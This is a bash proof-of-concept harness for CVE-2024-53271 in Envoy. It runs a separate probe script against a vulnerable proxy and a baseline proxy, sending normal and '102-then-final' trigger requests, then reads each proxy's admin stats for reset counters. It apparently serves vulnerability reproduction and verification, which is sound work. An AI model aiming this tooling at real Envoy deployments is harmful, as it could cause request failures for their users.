#!/usr/bin/env bash # CVE-2024-53271 — Envoy BALSA HTTP/1.1 double-MessageDone() differential PoC. # # Args (all positional, concrete values in exploit.md): # $1 VULN_HOST $2 VULN_PORT # $3 BASE_HOST $4 BASE_PORT # $5 TRIGGER_PATH $6 PLAIN_PATH # $7 COUNT $8 CONCURRENCY # # Drives the liveness pre-check (/plain) on both proxies, then the trigger # probe (/trigger) on both proxies, classifying each request clean vs failed. # It does NOT decide pass/fail — it surfaces the per-config clean-completion # rate so the verifier can read the differential. set -u VULN_HOST="$1"; VULN_PORT="$2" BASE_HOST="$3"; BASE_PORT="$4" TRIGGER_PATH="$5"; PLAIN_PATH="$6" COUNT="$7"; CONC="$8" HERE="$(cd "$(dirname "$0")" && pwd)" PROBE="$HERE/probe.py" echo "##############################################################" echo "# PRE-CHECK: liveness on /plain (no 1xx) — expected CLEAN on both" echo "##############################################################" python3 "$PROBE" "VULN-LIVENESS" "$VULN_HOST" "$VULN_PORT" "$PLAIN_PATH" "$COUNT" "$CONC" python3 "$PROBE" "BASELINE-LIVENESS" "$BASE_HOST" "$BASE_PORT" "$PLAIN_PATH" "$COUNT" "$CONC" echo "##############################################################" echo "# TRIGGER: /trigger (102-then-final) — the 1xx-then-final probe" echo "##############################################################" python3 "$PROBE" "VULN-TRIGGER" "$VULN_HOST" "$VULN_PORT" "$TRIGGER_PATH" "$COUNT" "$CONC" python3 "$PROBE" "BASELINE-TRIGGER" "$BASE_HOST" "$BASE_PORT" "$TRIGGER_PATH" "$COUNT" "$CONC" echo "##############################################################" echo "# Downstream reset / completion counters (corroboration)" echo "##############################################################" echo "--- VULN admin ingress_http downstream rq counters ---" curl -s "http://${VULN_HOST}:9900/stats" \ | grep -E 'ingress_http\.downstream_rq_(total|completed|rx_reset|tx_reset)' || true echo "--- BASELINE admin ingress_http downstream rq counters ---" curl -s "http://${BASE_HOST}:9901/stats" \ | grep -E 'ingress_http\.downstream_rq_(total|completed|rx_reset|tx_reset)' || true